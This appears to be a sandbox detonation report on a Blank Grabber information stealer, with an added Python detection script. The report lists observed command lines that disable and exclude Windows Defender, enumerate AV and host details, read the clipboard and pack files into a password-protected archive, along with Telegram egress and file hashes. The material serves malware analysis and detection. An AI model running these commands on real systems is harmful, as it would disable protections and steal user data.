| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ..."
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ...
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ruqm4wdt\ruqm4wdt.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp" "c:\Users\Admin\AppData\Local\Temp\ruqm4wdt\CSC8C309A8C3D16475DB646CB548D933F4.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\2gdsV.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\2gdsV.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
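The Processes list above is the whole Blank Grabber playbook written out as command lines: exclusion and kill-switch calls against Defender (Add-MpPreference, Set-MpPreference -Disable*, MpCmdRun -RemoveDefinitions), AV and host discovery (WMIC SecurityCenter2, tasklist, systeminfo, getmac, wmic csproduct get uuid), clipboard collection, and staging of the loot into a password-protected archive with the dropped rar.exe before it leaves the host. The Python below is an added example, not code from the sandbox or from the malware; it turns those command lines into detection logic over process-creation events. The event field names (pid, ppid, cmdline) are assumptions to be mapped from a Sysmon Event ID 1 or Security 4688 export, the sample events are constructed to mirror the list above, and the -EncodedCommand payload is invented because the report elides the real one; the decoder is there so the rules fire on the payload rather than only on its wrapper.

```python
"""Score process-creation events for the Blank Grabber chain in the Processes list.

Added example, not part of the sandbox report or the malware's code. Field names
(pid, ppid, cmdline) are assumed; map them from Sysmon Event ID 1 or Security 4688.
Sample events are constructed; the -EncodedCommand payload is invented because the
report elides the real one.
"""
import base64
import re
from collections import defaultdict

# One regex per behaviour, run against the raw command line and, where
# present, the decoded -EncodedCommand script.
RULES = {
    "defender_tamper": re.compile(
        r"set-mppreference\b.*-disable\w+\s+\$true"
        r"|mpcmdrun(\.exe)?\b.*-removedefinitions", re.I),
    "defender_exclusion": re.compile(r"add-mppreference\b.*-exclusionpath", re.I),
    "av_discovery": re.compile(r"securitycenter2\b.*antivirusproduct", re.I),
    "host_discovery": re.compile(
        r'(^|["\s\\])(tasklist|systeminfo|getmac|tree)(\.exe|\.com)?(\s|"|$)', re.I),
    "hwid_discovery": re.compile(r"wmic\s+csproduct\s+get\s+uuid", re.I),
    "clipboard_collect": re.compile(r"get-clipboard", re.I),
    "encrypted_staging": re.compile(r'\brar(\.exe)?"?\s+a\b.*\s-hp', re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Behaviour labels evidenced by one command line (empty set if none)."""
    labels, texts = set(), [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        labels.add("encoded_powershell")
        texts.append(decoded)  # match the payload, not just its wrapper
    for text in texts:
        labels.update(label for label, rx in RULES.items() if rx.search(text))
    return labels

def triage(events):
    """Fold each event onto its top-level ancestor; return {root: (verdict, labels)}."""
    by_pid = {e["pid"]: e for e in events}
    def root_of(pid):
        seen = set()  # guards against malformed cyclic ppid data
        while pid not in seen and by_pid.get(pid, {}).get("ppid") in by_pid:
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
        return pid
    trees = defaultdict(set)
    for e in events:
        trees[root_of(e["pid"])] |= classify(e["cmdline"])
    verdicts = {}
    for root, labels in trees.items():
        tamper = {"defender_tamper", "defender_exclusion"} & labels
        recon = {"av_discovery", "host_discovery", "hwid_discovery"} & labels
        collect = {"clipboard_collect", "encrypted_staging"} & labels
        if tamper and recon and collect:   # the full stealer pattern seen above
            verdict = "stealer_chain"
        elif tamper:                       # Defender tampering alone still escalates
            verdict = "defender_tampering"
        else:
            verdict = "suspicious" if labels else "benign"
        verdicts[root] = (verdict, labels)
    return verdicts

STE = r"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
CMD = r"C:\Windows\system32\cmd.exe"
# Constructed stand-in for the elided payload: "Get-Clipboard" as UTF-16LE base64.
SAMPLE_ENCODED = base64.b64encode("Get-Clipboard".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed; mirrors the Processes list, plus benign admin noise
    {"pid": 100, "ppid": 1, "cmdline": f'"{STE}"'},
    {"pid": 101, "ppid": 100, "cmdline": f'"{STE}"'},
    {"pid": 102, "ppid": 101, "cmdline": CMD + r''' /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"'''},
    {"pid": 103, "ppid": 101, "cmdline": CMD + r''' /c "powershell Set-MpPreference -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -Force & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'''},
    {"pid": 104, "ppid": 101, "cmdline": CMD + r''' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"'''},
    {"pid": 105, "ppid": 101, "cmdline": CMD + ' /c "tasklist /FO LIST"'},
    {"pid": 106, "ppid": 101, "cmdline": CMD + ' /c "wmic csproduct get uuid"'},
    {"pid": 107, "ppid": 101, "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + SAMPLE_ENCODED},
    {"pid": 108, "ppid": 101, "cmdline": CMD + r''' /c "C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\2gdsV.zip" *"'''},
    {"pid": 200, "ppid": 1, "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "cmdline": "powershell Get-MpPreference"},
]

if __name__ == "__main__":
    for root, (verdict, labels) in sorted(triage(SAMPLE_EVENTS).items()):
        print(root, verdict, sorted(labels))
```

On the constructed data the ste.exe tree comes back as a stealer chain while the explorer.exe tree stays benign. Two caveats for real telemetry: Security 4688 only carries the command line when "Include command line in process creation events" is enabled, and a Set-MpPreference -Disable* or MpCmdRun -RemoveDefinitions line is worth escalating on its own even without the rest of the tree. The Network table below supplies the matching egress indicator for this family, an ip-api.com lookup followed by api.telegram.org from the same host.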
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24322\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/4688-25-0x00007FF916D20000-0x00007FF917309000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI24322\base_library.zip
| MD5 | 9dc12ea9f7821873da74c772abb280f0 |
| SHA1 | 3f271c9f54bc7740b95eaa20debbd156ebd50760 |
| SHA256 | c5ec59385bfac2a0ac38abf1377360cd1fddd05c31f8a8b4e44252e0e63acb10 |
| SHA512 | a3175c170bbb28c199ab74ad3116e71f03f124d448bf0e9dd4afcacdc08a7a52284cf858cfd7e72d35bd1e68c6ba0c2a1a0025199aeb671777977ea53e1f2535 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ctypes.pyd
| MD5 | 26e65481188fe885404f327152b67c5e |
| SHA1 | 6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d |
| SHA256 | b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786 |
| SHA512 | 5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
memory/4688-30-0x00007FF91B980000-0x00007FF91B9A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ssl.pyd
| MD5 | 0c06eff0f04b3193a091aa6f77c3ff3f |
| SHA1 | fdc8f3b40b91dd70a65ada8c75da2f858177ca1b |
| SHA256 | 5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2 |
| SHA512 | 985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_sqlite3.pyd
| MD5 | 00a246686f7313c2a7fe65bbe4966e96 |
| SHA1 | a6c00203afab2d777c99cc7686bab6d28e4f3f70 |
| SHA256 | cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67 |
| SHA512 | c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_socket.pyd
| MD5 | abe1268857e3ace12cbd532e65c417f4 |
| SHA1 | dd987f29aabc940f15cd6bd08164ff9ae95c282f |
| SHA256 | 7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5 |
| SHA512 | 392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_queue.pyd
| MD5 | 3f13115b323fb7516054ba432a53e413 |
| SHA1 | 340b87252c92c33fe21f8805acb9dc7fc3ff8999 |
| SHA256 | 52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2 |
| SHA512 | 6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_lzma.pyd
| MD5 | 8bdd52b7bcab5c0779782391686f05c5 |
| SHA1 | 281aad75da003948c82a6986ae0f4d9e0ba988eb |
| SHA256 | d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a |
| SHA512 | 086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_hashlib.pyd
| MD5 | 82d28639895b87f234a80017a285822a |
| SHA1 | 9190d0699fa2eff73435adf980586c866639205f |
| SHA256 | 9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e |
| SHA512 | 4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe |
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI24322\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI24322\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI24322\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI24322\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0ih1e1i.s1w.ps1
\??\c:\Users\Admin\AppData\Local\Temp\ruqm4wdt\ruqm4wdt.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\ruqm4wdt\ruqm4wdt.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\ruqm4wdt\CSC8C309A8C3D16475DB646CB548D933F4.TMP
C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp
C:\Users\Admin\AppData\Local\Temp\ruqm4wdt\ruqm4wdt.dll
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\AddEnable.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DebugExport.xlsx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DisconnectBackup.mht
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\InvokeMove.docx
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\RegisterBackup.M2TS
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\UnlockCompare.pdf
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\CopyNew.png
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\ExportOptimize.png
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\FormatAdd.jpg
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\GroupUnprotect.jpeg
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\JoinLock.png
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10v2004-20240508-en
Max time kernel
91s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10v2004-20240508-en
Max time kernel
130s
Max time network
127s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win7-20240221-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10-20240404-en
Max time kernel
133s
Max time network
137s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.118.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
145s
Max time network
155s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\rong.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10-20240404-en
Max time kernel
133s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win7-20240221-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2928 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140Org.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2928 -s 80
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
90s
Max time network
99s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Maintenance\vcruntime140.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | insightinteriors.im | udp |
| US | 52.111.227.14:443 | | tcp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
